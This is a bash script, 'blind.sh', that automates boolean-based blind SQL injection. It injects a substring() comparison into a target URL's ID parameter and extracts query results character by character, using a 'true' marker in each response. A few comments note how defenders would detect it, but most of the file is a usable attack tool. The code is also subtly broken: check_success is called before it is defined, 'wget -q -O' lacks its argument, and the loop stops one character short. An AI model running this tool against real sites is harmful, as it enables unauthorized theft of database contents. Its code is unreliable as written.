#!/bin/bash
# Default values
# Defaults: every option starts empty so the "missing arguments" check
# below can tell an omitted flag from a supplied one.
URL=          # -u / --url
truestring=   # -t / --truestring
maxlength=    # -m / --maxlength
query=        # -q / --query
ID=           # -i / --id
# Help panel function
#######################################
# Print the usage text, one line per option, to stdout.
# Globals:   none
# Arguments: none
# Outputs:   usage text on stdout
# Returns:   0
#######################################
help_panel() {
  printf '%s\n' \
    "Usage: ./blind.sh [OPTIONS]" \
    "Options:" \
    " -u, --url The URL to query, f. ex: http://webpage.com/banddetails.php" \
    " -i, --id The ID parameter to use in the URL, f. ex: ?band=20" \
    " -t, --truestring The response that the web application shows when a request is successful, f. ex: We worked with them in the past" \
    " -m, --maxlength The maximum length of the substring to extract, f. ex: 20" \
    " -q, --query The SQL query to extract the substring from, see PentestMonkey SQL injection cheatsheets" \
    " -h, --help Show this help panel"
}
# Parse command line arguments
# Parse command line arguments. Each value option consumes two words
# (the flag and its value); the two separate shifts are deliberate so a
# trailing flag with no value still terminates the loop.
while (( $# > 0 )); do
  key=$1
  case "$key" in
    -u | --url)
      URL=$2
      shift   # the flag
      shift   # its value
      ;;
    -t | --truestring)
      truestring=$2
      shift   # the flag
      shift   # its value
      ;;
    -m | --maxlength)
      maxlength=$2
      shift   # the flag
      shift   # its value
      ;;
    -q | --query)
      query=$2
      shift   # the flag
      shift   # its value
      ;;
    -i | --id)
      ID=$2
      shift   # the flag
      shift   # its value
      ;;
    -h | --help)
      help_panel
      exit 0
      ;;
    *)
      # Anything else is an unknown option: report it and stop.
      echo "Unknown option: $key"
      help_panel
      exit 1
      ;;
  esac
done
# Check for missing arguments
# Check for missing arguments: all five options are mandatory.
[[ -n $maxlength && -n $query && -n $URL && -n $truestring && -n $ID ]] || {
  echo "Missing arguments!"
  help_panel
  exit 1
}
# Character set
# Character set: digits, the ASCII range A..z (brace expansion, which also
# covers the punctuation that sits between 'Z' and 'a'), plus a few extra
# symbols. `echo` joins the expansions into one space-separated string.
charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@)
# Extract the result, one position at a time: positions 1 through
# maxlength-1 are probed, and for each position every candidate in
# $charset is sent as its own request and judged by whether the response
# contains $truestring.
# NOTE(review): from a defender's side this is the classic boolean-based
# blind pattern — a burst of near-identical requests to one endpoint that
# differ only in the offset and candidate character. It is visible as a
# request-rate/parameter-variation signature in access logs and WAF
# telemetry; parameterized queries remove the underlying condition.
echo "Extracting the result for $query..."
result=""
for ((j=1;j<$maxlength;j+=1)); do
# Alias for the loop index, used in the progress messages and the probe.
nthchar=$j
# Deliberately unquoted: word-splitting turns the space-separated string
# into one candidate per iteration (it is also subject to pathname
# expansion, so a candidate such as '[' depends on the current directory).
for i in $charset; do
echo "Trying character number $nthchar: $i"
# Response body is whatever wget writes to stdout for this request;
# -q silences wget's own progress output.
response=$(wget "${URL}${ID}' and substring((${query}),${nthchar},1)='${i}" -q -O)
# A match means the page showed the "true" text for this candidate:
# record it and stop probing this position.
if check_success "$response" "$truestring"; then
echo "Character number $nthchar found: $i"
result+=$i
break
fi
done
done
echo "Result: $result"
# Check if the injection was successful
#######################################
# Report whether a response body contains the expected "true" marker.
# Globals:   response, truestring (both overwritten with the arguments —
#            the function uses no `local`, so these assignments leak out)
# Arguments: $1 - response body text
#            $2 - marker text, interpreted by grep as a basic regex
# Outputs:   none
# Returns:   0 when the marker matches somewhere in the body, 1 otherwise
#######################################
check_success() {
  response=$1
  truestring=$2
  if echo "$response" | grep -q "$truestring"; then
    return 0
  fi
  return 1
}